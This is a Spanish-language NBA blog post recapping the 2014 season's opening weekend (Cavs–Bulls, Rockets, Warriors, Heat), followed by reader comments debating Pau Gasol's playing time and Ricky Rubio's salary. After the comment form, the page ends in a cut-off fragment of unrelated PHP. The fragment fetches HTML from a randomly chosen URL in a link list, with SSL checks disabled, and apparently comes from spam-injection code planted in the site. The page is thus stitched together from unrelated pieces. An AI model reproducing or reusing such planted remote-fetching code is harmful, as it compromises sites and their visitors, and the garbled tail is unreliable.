Informe del fin semana: Warriors, Grizzlies, Rockets y Heat invictos

03 de November de 2014 por TheDeerHunter

Primer fin de semana del año y ahí habéis estado, al pie del cañón. Repasamos brevemente lo que ha acontecido.

El viernes el foco de atención estaba en la visita de los Cavs de LeBron a Chicago con el trono del Este en el punto de mira:

“Estará contento Pau Gasol después de ver casi todo el último cuarto y el OT desde el banquillo… Aunque la verdad es que casi le sale bien a Thibs, sin él y Rose con un Hinrich en plan heroico pudo ganar el partido. Pero LeBron James y Kyrie Irving no querían empezar perdiendo dos partidos. Muy bien el King en el tramo final y soberbio Tristan Thompson barriendo cualquier tiro fallado. 13 rebotes, 12 ofensivos.” Rumbero

Efectivamente vimos algo que ya ocurría el año pasado y que ya avisábamos que podría ocurrir muy pronto éste. Taj Gibson tiene mucho peso en los tramos decisivos de los partidos y de cómo digiera Pau esa situación dependerá buena parte de su rendimiento en su nuevo equipo. Rose terminó con un esguince en cada tobillo y LeBron y los suyos no desaprovecharon la ocasión para estrenar su casillero de victorias.

Además, asistimos a la primera campanada de los Suns, esta vez ante los campeones con un excelente Isaiah Thomas. Tampoco nos perdimos  los 40 puntos que Rudy Gay endosó a los Blazers ni los 39 de Blake Griffin a sus patéticos vecinos. Los Grizzlies se impusieron con dificultades a los Pacers gracias a la parejita interior y los Bucks hicieron lo propio ante los Sixers de la mano de un renacido OJ Mayo

El sábado había partidos para aburrir pero en el blog sólo nos fijamos en uno:

“Bochornoso lo de los Celtics esta noche… 1/22 en triples… Solo han perdido de 14 (llegaron a perder de 26 incluso…). Le falta mucho a este equipo para ser algo. Los Rockets han hecho lo que han querido, les entraba casi todo y Terrence Jones ha estado a nivel All-Star con 25 puntos. James Harden a lo suyo con 26.” franitis

Los Rockets firman un inicio de curso perfecto y se cebaron con unos Celtics atascados. Memphis y Miami tampoco conocen la derrota. Los primeros ganaron a los Hornets en un partido gris de resultado de Euroliga, con una decisivo Marc Gasol, y los segundos se impusieron en Philadelphia de la mano de un Chris Bosh que está al nivel de sus mejores años. Otros que no han perdido hasta el momento son los Warriors, el sábado Stephen Curry y Klay Thompson destrozaron la ridícula defensa de los Lakers.

Joe Johnson se marcó un tremendo partido para que los Nets doblegaran a unos Pistons hundidos en la miseria, como los Magic que tampoco conocen la victoria tras perder ante los Raptors su tercer partido (eso sí, ojo a Elfrid Payton). Los Bulls sin Rose se llevaron una victoria apuradísima ante Wolves mientras que los Mavs lograron una valiosa victoria ante Pelicans, a pesar de un gran Anthony Davis.

Asistimos a la primera expulsión de Paul Pierce como jugador de los Wizards pero aún así su equipo amarró la victoria ante Bucks con una gran actuación de Otto Porter. Finalmente, los Pacers cayeron en Atlanta, los Thunder se estrenaron con los “amistosos” Nuggets y los Suns perdieron en Utah lo que habían ganado la jornada anterior en San Antonio.

Ayer domingo, la gran sorpresa la protagonizaron los Kings que a pesar de ir perdiendo de 10 puntos en el tercer cuarto consiguieron remontar a los Clippers con un DeMarcus Cousins desatado. Chris Bosh, Dwyane Wade y los Heat confirmaron su gran nivel imponiéndose a los hasta ayer invictos Raptors y el duo dinámico de los Warriors sigue tocando la guitarra. Esta vez los “afortunados” fueron los Blazers a pesar de que LaMarcus Aldridge hizo todo lo posible por evitar el concierto. En New York, Carmelo Anthony consiguió el punto 20.000 de su carrera y los Knicks se impusieron a los Hornets.

 

Comenta

14 comentarios a esta entrada

  1. Rompe dice:
    #1

    Muy buen resumen! Aunque se echan en falta los premios…

      Citar

  2. rumbero dice:
    #2

    Tito Deer ha vuelto con sus crónicas. Aplausos en el auditorio!!!
    Esto ya lo hemos dicho muchas veces, y las que quedan, pero que pedazo jugador es Cousins cuando le da la gana. Físico y calidad. Con un implante de cerebro el tio sería la reostia

      Citar

  3. Azabel dice:
    #3

    quiero ver las mismas burlas que habia sobre boozer elñ año pasado cuando Gibson jugaba los finales de los juegos, perop ahora sobre Gasol, no? pau tampoco sirve para nada imagino

      Citar

  4. rumbero dice:
    #4

    Azabel:
    quiero ver las mismas burlas que habia sobre boozer elñ año pasado cuando Gibson jugaba los finales de los juegos, perop ahora sobre Gasol, no? pau tampoco sirve para nada imagino

    No empecemos con la supuesta españolitis. A Boozer se le han dado palos por la lamentable temporada que se cascó, no por no jugar los últimos cuartos. Como también se le han dado a Pau estos últimos años en Lakers.

      Citar

  5. Azabel dice:
    #5

    rumbero: No empecemos con la supuesta españolitis. A Boozer se le han dado palos por la lamentable temporada que se cascó, no por no jugar los últimos cuartos. Como también se le han dado a Pau estos últimos años en Lakers.

    ojo q Pau no es Ricke Rubio, me pongo de pie para hbablar de cualquiera de los Gasol, mas aun de Pau de lo mejor de la historia del viejo continente, solo digo q aqui se le ha dado durisimo a Boozer por no jugar los ultimos periodos y ahora vemos que pau, nueva super estrella de los Bulls, el hombre q es la clave npara llevarse el campeonato, termina mirnado el partido de la banca

    cosas q tom

      Citar

  6. Vader dice:
    #6

    Azabel: ojo q Pau no es Ricke Rubio, me pongo de pie para hbablar de cualquiera de los Gasol, mas aun de Pau de lo mejor de la historia del viejo continente, solo digo q aqui se le ha dado durisimo a Boozer por no jugar los ultimos periodos y ahora vemos que pau, nueva super estrella de los Bulls, el hombre q es la clave npara llevarse el campeonato, termina mirnado el partido de la banca

    cosas q tom

    Pau tuvo una mala serie de tiro en ese partido y hace poco que esta en el equipo, esas supongo que serian las explicaciones lógicas del entrenador. Pero en mi opinión fue un error dejarlo en el banquillo, sin Rose, Gasol es lo único que les podía dar la capacidad ofensiva necesaria para ganar el partido. Podrían haber perdido igualmente pero la imagen hubiera sido otra.

    Espero que esto se quede en anécdota y Gasol este año si juegue los minutos decisivos. Si no fuera así lo veo pidiendo el traspaso porque después de comerse los años que se comió en LA y de elegir cuidadosamente a Chicago por la importancia que podría tener en el equipo no me imagino nada más fustrante para él que verse relegado en los minutos importantes por… ¿Taj Gibson?

    Saludos

      Citar

  7. Azabel dice:
    #7

    Comparto, pero no se, tom es un bicho muy raro y gibson esta lejos de ser malo, pau estaba jugando un partidazo e igual lo saco, y gibson tan bueno q es, se comio un rebote ofensivo de thompson clave clave

      Citar

  8. nba dice:
    #8

    Apenas llevamos una semana de competicion y ya estamos rasgandonos las vestiduras porque Pau no este en los minutos finales en la cancha.
    Hay que recordar que de lo que va esto es de ganar partidos, la temporada es muy larga y todavia no veo al equipo tan suelto y sobre todo a Pau, para aportar ese factor diferencial que necesitan los Bulls en los minutos finales,
    Habría que ponerse de pie cuando se habla de Thibo que si por algo se ha caracterizado estos años es por hacer lo mejor para el equipo.
    Y Pau que se deje de tonterias y acaso se olvidó el motivo por el que ficho por Bulls, no esta para mas de 25-30 min en temporada regular, sino la quiere terminar arrastrandose.
    Demos algo de credito mas al entrenador que se lo tiene merecido.

      Citar

  9. Nacho dice:
    #9

    Azabel: ojo q Pau no es Ricke Rubio, me pongo de pie para hbablar de cualquiera de los Gasol, mas aun de Pau de lo mejor de la historia del viejo continente, solo digo q aqui se le ha dado durisimo a Boozer por no jugar los ultimos periodos y ahora vemos que pau, nueva super estrella de los Bulls, el hombre q es la clave npara llevarse el campeonato, termina mirnado el partido de la banca

    Perdona que aproveche tu comentario, Esteban, para sacar el hacha. No va solo a ti, que en este caso eres más suave, va para la bancada anti Rubio en general.
    Pero antes de ir a eso comparto contigo lo de ponerse en pie hablando de Pau. El baloncesto en España tiene tres
    momentos clave (desde que tengo uso de razón) para que no sea un deporte de frikis (aún así lo somos) que no duermen para ver lo que sucede al otro lado del Atlántico:
    1.- finales de los 70, principios de los 80, cuando un Real Madrid dirigido por Corbalán jugaba unos torneos de Navidad fabulosos contra equipos de universitarios y malabaristas del balón de EEUU y selecciones al otro lado del telón de acero. Más tarde Maccabi y equipos italianos. Imprescindibles.
    2.- JJOO Los Ángeles. España va ganando a Yugoslavia (la de los Petrovic), por veinte puntos arriba. Creo que es el primer hito en la historia de jalear a un equipo que pierde de paliza. En la final contra un equipo de EEUU (último y más memorable de los gloriosos equipos universitarios Ewing, Muliin y JORDAN)
    3.- La irrupción de Pau Gasol, su elección de draft, su trade a LA y todo lo que conocemos.
    Lo de ricky, capítulo aparte.

      Citar

  10. Nacho dice:
    #10

    Y ahora… el hacha de Minnesotta, jejeje.
    El tal Ricard Rubio es espectáculo. Y el espectáculo se paga.
    En este blog, en otros muchos foros, y sin ir más lejos Loncar la otra noche, se habla del despropósito del contrato de Rubio. Considero que se hace desde un prisma errado, e incluso tramposo.
    Loncar venía a decir que no es normal que cobre lo que cobra Hardem, con un impacto mucho menor en las aspiraciones de sus equipos. Si usamos esos argumentos, nos cargamos la liga. Porque deberían desaparecer la mitad de los equipos (siendo generosos).
    Este bendito deporte es un juego, pero también es espectáculo. Y de esto saben mucho en EEUU. En Minneápolis también. Pocas veces he visto un pabellón en pie por jugadores tan jóvenes como hace el de esta ciudad con Rubio. Me comentaba mi hermano que vio el Bulls Wolves de la otra noche, y que vale que Ricky había firmado el nuevo contrato, y que Rose no jugaba, pero es que las cámaras solo estaban pendientes de él. Si estaba en el banquillo, ahí enchufaban, en juego ni te digo… etc. Esa tele no era TV3, ni TVE1. El baloncesto son emociones, belleza (como concepto estético), tensión… supongo que a los que nos gusta nos pasa lo mismo que a los que le gustan los toros viendo una corrida (todos a una haciendo el chiste). Quien conozca el caso de Curro Romero, entenderá a qué me refiero.
    Existimos una serie de aficionados que disfrutan más de la belleza del deporte que de los éxitos de sus clubes (afortunadamente yo no tengo ningún equipo ni ACB, ni NBA por el que ponerme una bufanda, voy con los que me gusta ver jugar, y punto) Desde este punto de vista, Rubio es uno de las grandes estrellas del panorama del basketball. Y en Minneápolis lo saben. Cierto que los fans de bufanda querrían ganar anillos, pero son conscientes de que con un tal Garnett llegaron donde llegaron, y que es difícil que vuelvan a estar tan cerca, (pragmatismo del ceeeesto podría decir Montes) por eso, prefieren pagar una entrada por ver la faena perfecta de su Curro Romero, que es probable que no se de nunca, pero los detalles, ayy, los benditos detalles, merecieron la pena. Showtime!!!

    Posdata:
    No diré que LeBron no es el mejor. Seguramente lo sea, pero mi disfrute en este deporte, me lo ofrecen otro tipo de jugadores, aquellos que llevan tatuada la belleza en sus acciones. Nowitzki, Allen, Manu, Kobe, Rubio, Durant incluso… por ellos yo pago entradas a diario, por ver a LeBron un par de veces, seguro, y si llevo la bufanda a diario, obvio. Pero no me emociona como los otros.
    Hardem por Rubio en los Wolves no convertía a los del medio oeste en equipo de aspiraciones, por eso pagan otro tipo de espectáculo. Yo haría lo mismo.
    Sí, yo soy de Ricky Rubio.

      Citar

  11. Denise dice:
    #11

    Nacho:
    Y ahora… el hacha de Minnesotta, jejeje.
    El tal Ricard Rubio es espectáculo. Y el espectáculo se paga.
    En este blog, en otros muchos foros, y sin ir más lejos Loncar la otra noche, se habla del despropósito del contrato de Rubio. Considero que se hace desde un prisma errado, e incluso tramposo.
    Loncar venía a decir que no es normal que cobre lo que cobra Hardem, con un impacto mucho menor en las aspiraciones de sus equipos. Si usamos esos argumentos, nos cargamos la liga. Porque deberían desaparecer la mitad de los equipos (siendo generosos).
    Este bendito deporte es un juego, pero también es espectáculo. Y de esto saben mucho en EEUU. En Minneápolis también. Pocas veces he visto un pabellón en pie por jugadores tan jóvenes como hace el de esta ciudad con Rubio. Me comentaba mi hermano que vio el Bulls Wolves de la otra noche, y que vale que Ricky había firmado el nuevo contrato, y que Rose no jugaba, pero es que las cámaras solo estaban pendientes de él. Si estaba en el banquillo, ahí enchufaban, en juego ni te digo… etc. Esa tele no era TV3, ni TVE1. El baloncesto son emociones, belleza (como concepto estético), tensión… supongo que a los que nos gusta nos pasa lo mismo que a los que le gustan los toros viendo una corrida (todos a una haciendo el chiste). Quien conozca el caso de Curro Romero, entenderá a qué me refiero.
    Existimos una serie de aficionados que disfrutan más de la belleza del deporte que de los éxitos de sus clubes (afortunadamente yo no tengo ningún equipo ni ACB, ni NBA por el que ponerme una bufanda, voy con los que me gusta ver jugar, y punto) Desde este punto de vista, Rubio es uno de las grandes estrellas del panorama del basketball. Y en Minneápolis lo saben. Cierto que los fans de bufanda querrían ganar anillos, pero son conscientes de que con un tal Garnett llegaron donde llegaron, y que es difícil que vuelvan a estar tan cerca, (pragmatismo del ceeeesto podría decir Montes) por eso, prefieren pagar una entrada por ver la faena perfecta de su Curro Romero, que es probable que no se de nunca, pero los detalles, ayy, los benditos detalles, merecieron la pena. Showtime!!!

    Posdata:
    No diré que LeBron no es el mejor. Seguramente lo sea, peromi disfrute en este deporte, me lo ofrecen otro tipo de jugadores, aquellos que llevan tatuada la belleza en sus acciones. Nowitzki, Allen, Manu, Kobe, Rubio, Durant incluso… por ellos yo pago entradas a diario, por ver a LeBron un par de veces, seguro, y si llevo la bufanda a diario, obvio. Pero no me emociona como los otros.
    Hardem por Rubio en los Wolves no convertía a los del medio oeste en equipo de aspiraciones, por eso pagan otro tipo de espectáculo. Yo haría lo mismo.
    Sí, yo soy de Ricky Rubio.

    Pues para mí Ricky Rubio es de lo más sobrevalorado de la NBA en estos momentos. Un tio que no sabe tirar, no sabe jugar en estatico, no tiene clutch, no tiene nivel para ejercer de jugador franquicia y cobra como tal. Sobrevalorado no, lo siguiente.
    Respecto a lo que dices de si juega bonito y demás, cuando eres de un equipo lo que te importa es que tu equipo gane y tu jugador haga ganar partidos, no de si da un pase bonito o no, para eso me voy a ver a los Globertrotters.
    Que ademas, hablas de Rubio como si fuese el mismo Nash o Magic Johnson dando espectaculo en cada acción, cuando el espectaculo y los pases bonitos, que repito, no justifican su salario, lo hacen muchos cobrando menos.

      Citar

  12. nba dice:
    #12

    Amen Denise, comparto tu opinion sobre lo de Ricky.
    A este paso para cuando otro lock-out

      Citar

  13. txusma dice:
    #13

    nba:
    Amen Denise, comparto tu opinion sobre lo de Ricky.
    A este paso para cuando otro lock-out

    Con la de pasta que van a cobrar los equipos del nuevo contrato de televisión me da que estos contratos se van a quedar cortos y todo.

      Citar

  14. Denise dice:
    #14

    txusma: Con la de pasta que van a cobrar los equipos del nuevo contrato de televisión me da que estos contratos se van a quedar cortos y todo.

    Pues si a cualquier piltrafilla le van a firmar estas millonadas, será la muerte de la NBA como tal y nos vamos a hartar de ver idiotas y pasotas en las canchas. Y esto ya no lo digo por Ricky que dentro de lo que cabe se puede decir que tiene un nivel medio-alto, sino porque me da escalofrios solo de pensar que paquetorros tipo Derrick Williams, Wesley Johnson o despojos así pasen a cobrar 2 digitos..

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>